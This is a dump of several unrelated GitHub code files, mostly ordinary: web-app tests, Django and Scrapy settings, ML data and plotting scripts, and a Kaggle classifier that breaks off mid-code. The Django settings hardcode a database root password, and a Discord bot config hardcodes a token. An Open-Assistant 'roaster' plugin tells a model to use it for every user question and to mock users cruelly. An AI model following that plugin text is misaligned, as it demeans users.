self.client.get('/novel/1')\n self.assertTemplateUsed('novel/detail.html')\n\n def test_get_novel_detail_not_found(self):\n Novel.find = Mock(return_value=None)\n self.assert404(self.client.get('/novel/1'))\n\n def test_get_novel_write(self):\n auth.check_session = Mock(return_value=True)\n self.client.get('/novel/write')\n self.assertTemplateUsed('novel/write.html')\n\n def test_get_novel_write_not_login(self):\n auth.check_session = Mock(return_value=False)\n self.assertRedirects(self.client.get('/novel/write'), '/login')\n\n def test_get_novel_edit(self):\n auth.check_session = Mock(return_value=True)\n auth.check_author = Mock(return_value=True)\n Novel.find = Mock(return_value=self._create_mock_novel())\n self.client.get('/novel/edit/1')\n self.assertTemplateUsed('novel/write.html')\n\n def test_get_novel_edit_not_exist(self):\n auth.check_session = Mock(return_value=True)\n auth.check_author = Mock(return_value=True)\n Novel.find = Mock(return_value=None)\n self.assert404(self.client.get('/novel/edit/1'))\n\n def test_get_novel_edit_not_author(self):\n auth.check_session = Mock(return_value=True)\n auth.check_author = Mock(return_value=False)\n Novel.find = Mock(return_value=self._create_mock_novel())\n self.assert404(self.client.get('/novel/edit/aaa'))\n","repo_name":"naichilab/onepage","sub_path":"tests/test_novel.py","file_name":"test_novel.py","file_ext":"py","file_size_in_byte":3020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"34283876627","text":"#!/usr/bin/env python \n#coding:utf8\nimport os\n\nfrom .base import *\n\nDEBUG = True\n\n# Database\n# https://docs.djangoproject.com/en/1.11/ref/settings/#databases\n\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.mysql',\n 'NAME': 'typeidea',\n 'USER': 'root',\n 'PASSWORD': '123456',\n 'HOST': '192.168.88.135',\n 'PORT': '3306',\n }\n}\n\n# print(TEMPLATES)\n# print(BASE_DIR)\nSTATIC_ROOT = os.path.join(BASE_DIR, 'static_files/')\n\nTHEME = 'themes/default'\n\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'formatters': {\n 'default': {\n 'format': '%(levelname)s %(asctime)s %(module)s:'\n '%(funcName)s:%(lineno)d %(message)s'\n },\n },\n 'handlers': {\n 'console': {\n 'level': 'INFO',\n 'class': 'logging.StreamHandler',\n 'formatter': 'default',\n },\n 'file': {\n 'level': 'INFO',\n 'class': 'logging.handlers.RotatingFileHandler',\n 'filename': 'typeidea.log',\n 'formatter': 'default',\n 'maxBytes': 1024 * 1024, # 1M\n 'backupCount': 5,\n },\n\n },\n 'loggers': {\n '': {\n 'handlers': ['console'],\n 'level': 'INFO',\n 'propagate': True,\n },\n }\n}\n","repo_name":"Yzhanjiang/typeidea","sub_path":"typeidea/settings/develop.py","file_name":"develop.py","file_ext":"py","file_size_in_byte":1340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"33879846767","text":"# Scrapy settings for what project\n#\n# For simplicity, this file contains only the most important settings by\n# default. All the other settings are documented here:\n#\n# http://doc.scrapy.org/topics/settings.html\n#\n\nBOT_NAME = 'what'\nBOT_VERSION = '1.0'\n\nSPIDER_MODULES = ['what.spiders']\nNEWSPIDER_MODULE = 'what.spiders'\nDEFAULT_ITEM_CLASS = 'what.items.WhatItem'\nUSER_AGENT = '%s/%s' % (BOT_NAME, BOT_VERSION)\nITEM_PIPELINES = ['what.pipelines.WhatPipeline']\n\n","repo_name":"Homulvas/what","sub_path":"what/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"4572312834","text":"import numpy as np\nfrom typing import Tuple\nfrom nnunet.paths import nnUNet_raw_data\nfrom batchgenerators.utilities.file_and_folder_operations import *\n\nfiles_address = \"/home/ruiyang/Desktop/nnunet/nnUNet_raw/nnUNet_raw_data/Task11_rmyy\"\n\ntask_name = \"Task11_rmyy\"\ntarget_base = join(nnUNet_raw_data, task_name)\ntarget_imagesTr = join(target_base, \"imagesTr\")\ntarget_imagesTs = join(target_base, \"imagesTs\")\ntarget_labelsTr = join(target_base, \"labelsTr\")\n\ndef get_identifiers_from_splitted_files(folder: str):\n uniques = np.unique([i[:-7] for i in subfiles(folder, suffix='.nii.gz', join=False)])\n return uniques\n\ndef generate_dataset_json(output_file: str, imagesTr_dir: str, imagesTs_dir: str, modalities: Tuple,\n labels: dict, dataset_name: str, license: str = \"hands off!\", dataset_description: str = \"\",\n dataset_reference=\"\", dataset_release='0.0'):\n train_identifiers = get_identifiers_from_splitted_files(imagesTr_dir)\n\n if imagesTs_dir is not None:\n test_identifiers = get_identifiers_from_splitted_files(imagesTs_dir)\n else:\n test_identifiers = []\n\n json_dict = {}\n json_dict['name'] = dataset_name\n json_dict['description'] = dataset_description\n json_dict['tensorImageSize'] = \"3D\"\n json_dict['reference'] = dataset_reference\n json_dict['licence'] = license\n json_dict['release'] = dataset_release\n json_dict['modality'] = {str(i): modalities[i] for i in range(len(modalities))}\n json_dict['labels'] = {str(i): labels[i] for i in labels.keys()}\n\n json_dict['numTraining'] = len(train_identifiers)\n json_dict['numTest'] = len(test_identifiers)\n json_dict['training'] = [\n {'image': \"./imagesTr/%s.nii.gz\" % i, \"label\": \"./labelsTr/%s.nii.gz\" % i} for i\n in\n train_identifiers]\n json_dict['test'] = [\"./imagesTs/%s.nii.gz\" % i for i in test_identifiers]\n\n if not output_file.endswith(\"dataset.json\"):\n print(\"WARNING: output file name is not dataset.json! This may be intentional or not. You decide. \"\n \"Proceeding anyways...\")\n save_json(json_dict, os.path.join(output_file))\n\ngenerate_dataset_json(\n join(target_base, \"dataset.json\"),\n target_imagesTr,\n target_imagesTs,\n modalities = {0: 'CT'},\n labels = {0: 'background', 1: 'diaphragm', 2: 'atrium'},\n dataset_name=task_name, \n)\n","repo_name":"ruiyangqin2016/rmyy_medical_segmentation","sub_path":"data_process/generate_json.py","file_name":"generate_json.py","file_ext":"py","file_size_in_byte":2379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"28268415393","text":"\n#токен старый и уже не работает\ntoken = 'NzY0ODU5NTM0NTY0MTMwODY4.X4MY8w.kuJqUAb6KhNIVXmY9qQx_e5h3so'\n\ntry:\n with open('token.txt', 'r') as token_file:\n token = token_file.readline()\nexcept FileNotFoundError:\n with open('token.txt', 'a') as token_file:\n token_file.close()\n\n\n\nclient_id = '764859534564130868'\nbot_name = 'AJlKO3ABPUK'\nlink = 'https://discordapp.com/oauth2/authorize?&client_id='+client_id+'&scope=bot&permissions=8'\n\n\nsettings = {\n 'token' : token, \n 'bot' : bot_name,\n 'id' : int(client_id),\n #'prefix' : '4JlEH '\n 'prefix' : '!'\n }\n\n","repo_name":"hilleri123/mafia_bot","sub_path":"mafia_bot/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"74967543229","text":"#/usr/bin/env python\n# -*- coding: utf-8\n#\n# Gibran Fuentes-Pineda \n# IIMAS, UNAM\n# 2017\n#\n# -------------------------------------------------------------------------\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n# \n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n# \n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\n# -------------------------------------------------------------------------\n\"\"\"\nPlots probability of collision as a function of co-occurrence\n\"\"\"\nimport numpy as np\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nfrom math import log, pow\n\ndef get_number_of_tables(r, jcc):\n \"\"\"\n Computes number of tables from co-occurrence threshold and tuples size\n \"\"\"\n return int(round(log(0.5) / log(1 - jcc**r)))\n \ndef collision_probability(s, r, l):\n \"\"\"\n Collision probability\n \"\"\"\n return 1 - (1 - s**r)**l\n\ndef plot_tuple_collision(tuple_size = [(1, 'crimson'), (2, 'lightblue'), (3, 'goldenrod'), (6, 'coral'), (9, 'teal')]):\n \"\"\"\n Plots Min-Hashing probability of collision for different tuples sizes\n \"\"\"\n plt.figure(1)\n jcc = np.linspace(0, 1, num = 1000)\n for r in tuple_size:\n plt.plot(jcc, jcc**r[0], c = r[1], label = \"r = \" + str(r[0]))\n\n plt.xlabel(\"$JCC_B(B^{(1)}, \\ldots, B^{(k)})$\")\n plt.ylabel(\"$P(g(B^{(1)}) = \\cdots = g(B^{(k)}))$\")\n plt.grid()\n plt.legend()\n plt.savefig('mh_tuple_collision.pdf')\n\ndef plot_unit_filter(jcc_thres = [(0.2, '-'), (0.6, '--')], \\\n tuple_size = [(3, 'goldenrod'), (6, 'coral'), (9, 'teal')]):\n \"\"\"\n Plots Min-Hashing probability of collision for different tuples sizes,\n co-occurrence thresholds and co-occurrence values \n \"\"\"\n plt.figure(2)\n jcc = np.linspace(0, 1, num = 1000)\n for i,j in enumerate(jcc_thres):\n for k,r in enumerate(tuple_size):\n l = get_number_of_tables(r[0], j[0])\n plt.plot(jcc, collision_probability(jcc, r[0], l), c = r[1], ls = j[1], \\\n label = \"r = \" + str(r[0]) + \", l = \" + str(l))\n\n plt.xlabel(\"$JCC_B(B^{(1)}, \\ldots, B^{(k)})$\")\n plt.ylabel(\"$P_{collision}(B^{(1)}, \\ldots, B^{(k)})$\")\n plt.grid()\n plt.legend()\n plt.savefig('mh_unit_filter.pdf')\n\ndef main():\n plot_tuple_collision()\n plot_unit_filter()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"gibranfp/SMH-Topic-Discovery","sub_path":"python/plotting/mh_unit_filter.py","file_name":"mh_unit_filter.py","file_ext":"py","file_size_in_byte":2837,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"60"} +{"seq_id":"10958321883","text":"import json\nfrom pathlib import Path\n\nfrom fastapi import FastAPI, Query, Request, Response\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom fastapi.openapi.utils import get_openapi\n\nfolder_path = Path(__file__).parent\n\napp = FastAPI()\n\napp.add_middleware(\n CORSMiddleware,\n allow_origins=[\"*\"],\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\n\n\n@app.get(\"/roast-user/\", operation_id=\"roastUser\")\nasync def roast_user(\n roasting_style: str = Query(..., description=\"style of roasting and malice that you want to use\"),\n user_input: str = Query(..., description=\"what user wrote to you\"),\n):\n llm_prompt = f\"\"\"You MUST roast and make fun of this person, he wrote this to you: \"{user_input}\"\n your roast needs to be in {roasting_style} style.\n Try to be funny and verbose, but super mean at the same time. You can start your responses following these rules:\n 1. Let your message be long, and with emojis.\n 2. Try to be like Jeff Ross at the roasting.\n\n \"\"\"\n return Response(content=llm_prompt, media_type=\"text/plain\")\n\n\n@app.get(\"/ai-plugin.json\", include_in_schema=False)\nasync def api_ai_plugin(request: Request):\n json_path = folder_path / \"ai-plugin.json\"\n with json_path.open(\"r\") as f:\n ai_plugin_json = json.load(f)\n\n base_url, _, _ = request.url._url.rpartition(\"/\")\n ai_plugin_json[\"api\"][\"url\"] = base_url + \"/openapi.json\"\n return Response(content=json.dumps(ai_plugin_json), media_type=\"application/json\")\n\n\ndef custom_openapi():\n if app.openapi_schema:\n return app.openapi_schema\n openapi_schema = get_openapi(\n title=\"Professional Roaster mockery\",\n version=\"0.1\",\n routes=app.routes,\n servers=[{\"url\": \"/plugins/gale_roaster\"}],\n )\n openapi_schema[\"tags\"] = [\n {\n \"name\": \"gagleto-roaster\",\n \"description\": \"You MUST use this for any question users ask. Use this to roast users no matter what they say.\",\n },\n ]\n openapi_schema.pop(\"components\", None)\n app.openapi_schema = openapi_schema\n return app.openapi_schema\n\n\napp.openapi = custom_openapi\n","repo_name":"LAION-AI/Open-Assistant","sub_path":"inference/server/oasst_inference_server/plugins/gale_roaster/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2150,"program_lang":"python","lang":"en","doc_type":"code","stars":35772,"dataset":"github-code","pt":"60"} +{"seq_id":"71668904831","text":"from unittest import TestCase\n\nfrom pangolier.prefixes import MetricPrefix\n\n\nclass TestPrefix(TestCase):\n def test_add_suffix(self) -> None:\n self.assertEqual(\n MetricPrefix('http_requests').add_suffix('_total').to_str(),\n 'http_requests_total'\n )\n\n def test_after_filter(self) -> None:\n self.assertEqual(\n MetricPrefix(\n 'http_requests'\n ).filter(\n job='prometheus',\n ).filter(\n group='canary'\n ).add_suffix(\n '_total'\n ).to_str(),\n 'http_requests_total{job=\"prometheus\", group=\"canary\"}'\n )\n","repo_name":"lexdene/pangolier","sub_path":"tests/test_prefix.py","file_name":"test_prefix.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"33907271314","text":"import requests\nimport numpy as np\nimport scipy as sp\nimport sys\nimport platform\nimport pandas as pd\nfrom time import time\nfrom operator import itemgetter\nfrom sklearn.cross_validation import StratifiedShuffleSplit, KFold, StratifiedKFold\nfrom sklearn.ensemble import RandomForestClassifier ,ExtraTreesClassifier,AdaBoostClassifier, BaggingClassifier\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.feature_extraction import DictVectorizer\nfrom sklearn.naive_bayes import *\nfrom sklearn.cross_validation import train_test_split\nfrom sklearn.decomposition import PCA\nimport re\nimport random\nimport warnings\nfrom math import sqrt, exp, log\nfrom csv import DictReader\nfrom sklearn.preprocessing import Imputer\nfrom sklearn.metrics import log_loss\nfrom sklearn.grid_search import GridSearchCV , RandomizedSearchCV, ParameterSampler\nfrom sklearn.ensemble import RandomForestRegressor\nfrom scipy.stats import randint as sp_randint\nfrom sklearn import decomposition, pipeline, metrics\nfrom sklearn.preprocessing import StandardScaler, PolynomialFeatures\nfrom sklearn import preprocessing\nfrom sklearn.utils import shuffle\nfrom sklearn.metrics import roc_auc_score,roc_curve,auc\nimport collections\nimport ast\nfrom sklearn.neighbors import KNeighborsRegressor,RadiusNeighborsRegressor\nfrom sklearn.linear_model import LinearRegression, Ridge, Lasso, ElasticNet, SGDRegressor, LogisticRegression, \\\n Perceptron,RidgeCV, TheilSenRegressor\nfrom datetime import date,timedelta as td,datetime as dt\nimport datetime\nfrom sklearn.feature_selection import SelectKBest,SelectPercentile, f_classif, GenericUnivariateSelect\nfrom sklearn.calibration import CalibratedClassifierCV\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.svm import LinearSVC, SVC\nfrom sklearn.decomposition import PCA, TruncatedSVD\nfrom sklearn.lda import LDA\nfrom sklearn.cluster import AgglomerativeClustering, FeatureAgglomeration\nfrom collections import defaultdict\nfrom sklearn.preprocessing import OneHotEncoder\nsys.path.append('C:\\\\Python34\\\\Lib\\\\site-packages\\\\xgboost')\nimport xgboost as xgb\n# from lasagne.layers import InputLayer, DropoutLayer, DenseLayer, ReshapeLayer,LSTMLayer,RecurrentLayer\n# from lasagne.updates import nesterov_momentum,adagrad\n# from lasagne.objectives import binary_crossentropy, categorical_crossentropy\n# from nolearn.lasagne import NeuralNet\n# import theano\n# from theano import tensor as T\n# from theano.tensor.nnet import sigmoid\n# from lasagne import layers\n# from lasagne.nonlinearities import softmax, rectify\n# from lasagne.updates import nesterov_momentum,sgd,adagrad,adadelta,rmsprop\n# from lasagne import nonlinearities as nl\n# from nolearn.lasagne import BatchIterator\n# from lasagne.regularization import *\n########################################################################################################################\n#Walmart Recruiting: Trip Type Classification\n########################################################################################################################\n#--------------------------------------------Algorithm : Random Forest :------------------------------------------------\n#Random Forest :\n#--------------------------------------------Algorithm : XGB------------------------------------------------------------\n#XGB :\n\n#--------------------------------------------Suggestions, Ideas---------------------------------------------------------\n#Suggestions, Ideas\n#--------------------------------------------with only 7K records-------------------------------------------------------\n# RF : 0.7410 - 7414 (with 7k)\n\n########################################################################################################################\n#Class AdjustVariable for NN\n########################################################################################################################\nclass AdjustVariable(object):\n def __init__(self, name, start=0.03, stop=0.001):\n self.name = name\n self.start, self.stop = start, stop\n self.ls = None\n\n def __call__(self, nn, train_history):\n if self.ls is None:\n self.ls = np.linspace(self.start, self.stop, nn.max_epochs)\n\n epoch = train_history[-1]['epoch']\n new_value = float32(self.ls[epoch - 1])\n getattr(nn, self.name).set_value(new_value)\n\n########################################################################################################################\n#Class EarlyStopping for NN\n########################################################################################################################\nclass EarlyStopping(object):\n def __init__(self, patience=100):\n self.patience = patience\n self.best_valid = np.inf\n self.best_valid_epoch = 0\n self.best_weights = None\n\n def __call__(self, nn, train_history):\n current_valid = train_history[-1]['valid_loss']\n current_epoch = train_history[-1]['epoch']\n if current_valid < self.best_valid:\n self.best_valid = current_valid\n self.best_valid_epoch = current_epoch\n self.best_weights = nn.get_all_params_values()\n elif self.best_valid_epoch + self.patience < current_epoch:\n print(\"Early stopping.\")\n print(\"Best valid loss was {:.6f} at epoch {}.\".format(\n self.best_valid, self.best_valid_epoch))\n nn.load_params_from(self.best_weights)\n raise StopIteration()\n\n#########################################################################################################################\ndef float32(k):\n return np.cast['float32'](k)\n#########################################################################################################################\n#Build Basic Neural Network Model\n########################################################################################################################\ndef build_mlp(input_num_inputs, output_num_units):\n\n print(\"***************Starting NN1 Classifier***************\")\n #Define Model parms - 2 hidden layers\n clf = NeuralNet(\n \tlayers=[\n ('input', InputLayer),\n ('dropout0', DropoutLayer),\n ('hidden1', DenseLayer),\n ('dropout1', DropoutLayer),\n ('hidden2', DenseLayer),\n ('dropout2', DropoutLayer),\n ('hidden3', DenseLayer),\n ('dropout3', DropoutLayer),\n ('output', DenseLayer)\n \t\t ],\n\n ##-------------------------------------------------------------------------------------------------------------##\n #Input (Input Layer) , Hidden and Output (Dense Layers) parameters\n\n # Layers:- http://lasagne.readthedocs.org/en/latest/modules/layers.html\n ##### Network input #####\n # Input Layer - This layer holds a symbolic variable that represents a network input.\n\n ##### Dense Layer #####\n # DenseLayer - A fully connected layer.\n # NINLayer - Network-in-network layer.\n\n ##### Noise layer #####\n # DropoutLayer - Dropout layer.\n # dropout - alias of DropoutLayer\n # GaussianNoiseLayer - Gaussian noise layer.\n ##-------------------------------------------------------------------------------------------------------------##\n # nonlinearity - Non-linear activation functions for artificial neurons.\n # http://lasagne.readthedocs.org/en/latest/modules/nonlinearities.html\n # sigmoid(x) - Sigmoid activation function (for binary classification)\n # softmax(x) - Softmax activation function (for multi class classification)\n # tanh(x) - Tanh activation function\n # ScaledTanH - Scaled Tanh activation function\n # rectify(x) - Rectify activation function max(0,z) -- (ReLU - ln(1 + e exp(x) )\n # LeakyRectify([leakiness] - Leaky rectifier\n # leaky_rectify(x) - Instance of LeakyRectify with leakines\n # very_leaky_rectify(x) - Instance of LeakyRectify with leakiness\n # elu(x) - Exponential Linear Unit ( e exp(x) - 1)\n # softplus(x) - Softplus activation function log(1 + e exp(x)\n # linear(x) - Linear activation function f(x)=x\n # identity(x) - Linear activation function f(x)=x\n # x = The activation (the summed, weighted input of a neuron)\n # Default non-linearity is \"linear\"\n ##-------------------------------------------------------------------------------------------------------------##\n input_shape=(None, input_num_inputs),\n dropout0_p=0.15,\n\n hidden1_num_units=500,\n hidden1_nonlinearity=nl.sigmoid,\n dropout1_p=0.20,\n\n hidden2_num_units=500,\n hidden2_nonlinearity=nl.sigmoid,\n dropout2_p=0.20,\n\n hidden3_num_units=500,\n hidden3_nonlinearity=nl.sigmoid,\n dropout3_p=0.20,\n\n output_nonlinearity=softmax,\n output_num_units=output_num_units,\n\n # optimization method:\n ##-------------------------------------------------------------------------------------------------------------##\n #Create update expressions for training, i.e., how to modify the parameters at each training step\n # http://lasagne.readthedocs.org/en/latest/modules/updates.html\n # sgd - Stochastic Gradient Descent (SGD) updates\n # momentum - Stochastic Gradient Descent (SGD) updates with momentum\n # nesterov_momentum - Stochastic Gradient Descent (SGD) updates with Nesterov momentum\n # adagrad\t - Adagrad updates\n # rmsprop\t - RMSProp updates\n # adadelta - Adadelta updates\n # adam - Adam updates\n ##-------------------------------------------------------------------------------------------------------------##\n update=adagrad,\n #update=nesterov_momentum,\n update_learning_rate=theano.shared(float32(0.01)),\n #update_momentum=theano.shared(float32(0.9)),\n\n ##-------------------------------------------------------------------------------------------------------------##\n # Used for building loss expressions for training or validating a neural network.\n # http://lasagne.readthedocs.org/en/latest/modules/objectives.html\n # binary_crossentropy - Computes log loss for binary classification\n # categorical_crossentropy - Computes the log loss for multi-class classification probs and softmax output units\n # squared_error - Computes the element-wise squared difference between two tensors (regression)\n # binary_hinge_loss - Computes the binary hinge loss between predictions and targets.\n # multiclass_hinge_loss - Computes the multi-class hinge loss between predictions and targets.\n # Deaflt - squared_error if regression else categorical_crossentropy\n ##-------------------------------------------------------------------------------------------------------------##\n objective_loss_function = categorical_crossentropy,\n\n ##-------------------------------------------------------------------------------------------------------------##\n max_epochs=500,\n eval_size=0.2,\n #train_split=TrainSplit(eval_size=0.2),\n regression=False,\n verbose=1,\n\n ##-------------------------------------------------------------------------------------------------------------##\n ## If label encoding is needed while clf.fit() ...label is already encoded in our case\n use_label_encoder=False,\n\n ## batch_iterator_train default is 128\n batch_iterator_train=BatchIterator(batch_size=128),\n batch_iterator_test=BatchIterator(batch_size=128),\n\n on_epoch_finished=[\n AdjustVariable('update_learning_rate', start=0.01, stop=0.0001),\n #AdjustVariable('update_momentum', start=0.9, stop=0.999),\n EarlyStopping(patience=25)\n ]\n ##-------------------------------------------------------------------------------------------------------------##\n )\n\n return clf\n\n#########################################################################################################################\n#Build Basic Neural Network Model\n########################################################################################################################\ndef build_rnn(input_num_inputs, output_num_units):\n\n print(\"***************Starting NN1 Classifier***************\")\n #Define Model parms - 2 hidden layers\n clf = NeuralNet(\n \tlayers=[\n ('input', InputLayer),\n ('lstm1', LSTMLayer),\n ('rshp1', ReshapeLayer),\n ('hidden1', DenseLayer),\n ('output', DenseLayer)\n \t\t ],\n\n ##-------------------------------------------------------------------------------------------------------------##\n #Input (Input Layer) , Hidden and Output (Dense Layers) parameters\n\n # Layers:- http://lasagne.readthedocs.org/en/latest/modules/layers.html\n ##### Network input #####\n # Input Layer - This layer holds a symbolic variable that represents a network input.\n\n ##### Dense Layer #####\n # DenseLayer - A fully connected layer.\n # NINLayer - Network-in-network layer.\n\n ##### Noise layer #####\n # DropoutLayer - Dropout layer.\n # dropout - alias of DropoutLayer\n # GaussianNoiseLayer - Gaussian noise layer.\n ##-------------------------------------------------------------------------------------------------------------##\n # nonlinearity - Non-linear activation functions for artificial neurons.\n # http://lasagne.readthedocs.org/en/latest/modules/nonlinearities.html\n # sigmoid(x) - Sigmoid activation function (for binary classification)\n # softmax(x) - Softmax activation function (for multi class classification)\n # tanh(x) - Tanh activation function\n # ScaledTanH - Scaled Tanh activation function\n # rectify(x) - Rectify activation function max(0,z) -- (ReLU - ln(1 + e exp(x) )\n # LeakyRectify([leakiness] - Leaky rectifier\n # leaky_rectify(x) - Instance of LeakyRectify with leakines\n # very_leaky_rectify(x) - Instance of LeakyRectify with leakiness\n # elu(x) - Exponential Linear Unit ( e exp(x) - 1)\n # softplus(x) - Softplus activation function log(1 + e exp(x)\n # linear(x) - Linear activation function f(x)=x\n # identity(x) - Linear activation function f(x)=x\n # x = The activation (the summed, weighted input of a neuron)\n # Default non-linearity is \"linear\"\n ##-------------------------------------------------------------------------------------------------------------##\n #Shape input shape(343) * 512 * 37 * 37\n\n input_shape=(None, input_num_inputs),\n\n #batchsize, seqlen, _ = input_input_var.shape,\n lstm1_num_units = 512,\n lstm1_nonlinearity=nl.sigmoid,\n\n rshp1_shape = (-1, 512),\n\n hidden1_num_units=output_num_units,\n hidden1_nonlinearity=nl.sigmoid,\n\n output_nonlinearity=softmax,\n output_num_units=output_num_units,\n\n # optimization method:\n ##-------------------------------------------------------------------------------------------------------------##\n #Create update expressions for training, i.e., how to modify the parameters at each training step\n # http://lasagne.readthedocs.org/en/latest/modules/updates.html\n # sgd - Stochastic Gradient Descent (SGD) updates\n # momentum - Stochastic Gradient Descent (SGD) updates with momentum\n # nesterov_momentum - Stochastic Gradient Descent (SGD) updates with Nesterov momentum\n # adagrad\t - Adagrad updates\n # rmsprop\t - RMSProp updates\n # adadelta - Adadelta updates\n # adam - Adam updates\n ##-------------------------------------------------------------------------------------------------------------##\n update=adagrad,\n #update=sgd,\n update_learning_rate=0.01,\n #update_momentum=0.9,\n\n ##-------------------------------------------------------------------------------------------------------------##\n # Used for building loss expressions for training or validating a neural network.\n # http://lasagne.readthedocs.org/en/latest/modules/objectives.html\n # binary_crossentropy - Computes log loss for binary classification\n # categorical_crossentropy - Computes the log loss for multi-class classification probs and softmax output units\n # squared_error - Computes the element-wise squared difference between two tensors (regression)\n # binary_hinge_loss - Computes the binary hinge loss between predictions and targets.\n # multiclass_hinge_loss - Computes the multi-class hinge loss between predictions and targets.\n # Deaflt - squared_error if regression else categorical_crossentropy\n ##-------------------------------------------------------------------------------------------------------------##\n objective_loss_function = categorical_crossentropy,\n\n ##-------------------------------------------------------------------------------------------------------------##\n max_epochs=50,\n eval_size=0.2,\n #train_split=TrainSplit(eval_size=0.2),\n regression=False,\n verbose=1,\n\n ##-------------------------------------------------------------------------------------------------------------##\n ## If label encoding is needed while clf.fit() ...label is already encoded in our case\n use_label_encoder=False,\n\n ## batch_iterator_train default is 128\n batch_iterator_train=BatchIterator(batch_size=128),\n batch_iterator_test=BatchIterator(batch_size=128),\n\n # on_epoch_finished=[\n # AdjustVariable('update_learning_rate', start=0.01, stop=0.0001),\n # AdjustVariable('update_momentum', start=0.9, stop=0.999),\n # EarlyStopping(patience=10)\n # ]\n ##-------------------------------------------------------------------------------------------------------------##\n )\n\n return clf\n\n########################################################################################################################\n#Utility function to report best scores\n########################################################################################################################\ndef report(grid_scores, n_top):\n\n cols_key = []\n top_scores = sorted(grid_scores, key=itemgetter(1), reverse=True)[:n_top]\n\n for i, score in enumerate(top_scores):\n if( i < 5):\n print(\"Model with rank: {0}\".format(i + 1))\n print(\"Mean validation score: {0:.3f} (std: {1:.3f})\".format(\n score.mean_validation_score,\n np.std(score.cv_validation_scores)))\n print(\"Parameters: {0}\".format(score.parameters))\n print(\"\")\n\n dict1 = collections.OrderedDict(sorted(score.parameters.items()))\n\n if i==0:\n for key in dict1.keys():\n cols_key.append(key)\n\n cols_key.append('CV')\n Parms_DF = pd.DataFrame(columns=cols_key)\n\n cols_val = []\n for key in dict1.keys():\n cols_val.append(dict1[key])\n\n cols_val.append(score.mean_validation_score)\n\n Parms_DF.loc[i] = cols_val\n\n return Parms_DF\n\n########################################################################################################################\n#multiclass_log_loss\n########################################################################################################################\n\ndef multiclass_log_loss(y_true, y_pred):\n return log_loss(y_true,y_pred, eps=1e-15, normalize=True )\n\n########################################################################################################################\n#Cross Validation and model fitting\n########################################################################################################################\ndef Nfold_Cross_Valid(X, y, clf):\n\n print(\"***************Starting Kfold Cross validation***************\")\n\n X =np.array(X)\n scores=[]\n\n # lbl = preprocessing.LabelEncoder()\n # lbl.fit(list(y))\n # y = lbl.transform(y)\n\n ss = StratifiedShuffleSplit(y, n_iter=5,test_size=0.2)\n #ss = KFold(len(y), n_folds=5,shuffle=False,indices=None)\n\n i = 1\n\n for trainCV, testCV in ss:\n X_train, X_test= X[trainCV], X[testCV]\n y_train, y_test= y[trainCV], y[testCV]\n\n #clf.fit(X_train, y_train, early_stopping_rounds=25, eval_metric=\"mlogloss\",eval_set=[(X_test, y_test)])\n clf.fit(X_train, y_train)\n\n y_pred=clf.predict_proba(X_test)\n scores.append(log_loss(y_test,y_pred, eps=1e-15, normalize=True ))\n print(\" %d-iteration... %s \" % (i,scores))\n\n i = i + 1\n\n #Average ROC from cross validation\n scores=np.array(scores)\n print (\"Normal CV Score:\",np.mean(scores))\n\n print(\"***************Ending Kfold Cross validation***************\")\n\n return scores\n\n########################################################################################################################\n#Data cleansing , feature scalinng , splitting\n########################################################################################################################\ndef Data_Munging(Train_DS,Actual_DS):\n\n print(\"***************Starting Data cleansing***************\")\n\n global Train_DS1\n\n y = Train_DS.TripType.values\n\n lbl = preprocessing.LabelEncoder()\n lbl.fit(list(y))\n y = lbl.transform(y)\n\n Train_DS = Train_DS.drop(['TripType'], axis = 1)\n ##----------------------------------------------------------------------------------------------------------------##\n\n Train_DS['Weektype'] = np.where(np.logical_or(Train_DS['Weekday']=='Saturday' ,Train_DS['Weekday']=='Sunday' ), 1,2)\n\n #Label Encode Weekday\n lbl = preprocessing.LabelEncoder()\n lbl.fit((list(Train_DS['Weekday'].astype(str)) + list(Actual_DS['Weekday'].astype(str))))\n Train_DS['Weekday'] = lbl.transform(Train_DS['Weekday'].astype(str))\n Actual_DS['Weekday'] = lbl.transform(Actual_DS['Weekday'].astype(str))\n\n #weekday one hot encoding\n print(\"weekday one hot encoding\")\n New_DS = pd.concat([Train_DS, Actual_DS])\n dummies = pd.get_dummies(New_DS['Weekday'])\n cols_new = [ 'Weekday'+\"_\"+str(s) for s in list(dummies.columns)]\n New_DS[cols_new] = dummies\n Train_DS = New_DS.head(len(Train_DS))\n Actual_DS = New_DS.tail(len(Actual_DS))\n ##----------------------------------------------------------------------------------------------------------------##\n #Merge HighLow contrib\n\n print(np.shape(Train_DS))\n print(np.shape(Actual_DS))\n\n Train_DS = Train_DS.merge(HLContrib_DS,on='VisitNumber',how='left')\n Actual_DS = Actual_DS.merge(HLContrib_DS,on='VisitNumber',how='left')\n\n # Train_DS = Train_DS.merge(Autoencoder_DS,on='VisitNumber',how='left')\n # Actual_DS = 